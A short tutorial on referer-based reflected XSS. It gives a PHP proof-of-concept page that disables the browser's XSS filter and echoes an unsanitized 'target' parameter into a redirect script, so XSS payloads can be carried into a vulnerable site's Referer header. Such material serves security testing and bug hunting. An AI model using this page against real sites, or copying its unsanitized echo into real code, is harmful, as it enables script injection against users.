What is referer based XSS?
Like any other reflection based XSS where Referer value gets reflected into response body without any sanitization, this happens when a web application makes use of referer value for any feature/tracking, etc.
Note:- By default browsers encode referer URLs, so this only applies where application make use of URLdecoded referer URL.
Here is how vulnerable page looks like:-
How to exploit?
To control the referer header, one can make a redirection from the controlled page and append the XSS payloads in the URI, here is the hosted version of POC in action.
<?php header('X-XSS-Protection: 0'); ?> <!DOCTYPE html> <html> <head> <title>Referer based XSS testing</title> </head> <body> <script>window.location.replace('<?php echo $_GET['target']; ?>');</script> </body> </html>
Feel free to host it for your self or use the hosted version, now go back and check if you missed any XSS in a similar scenario.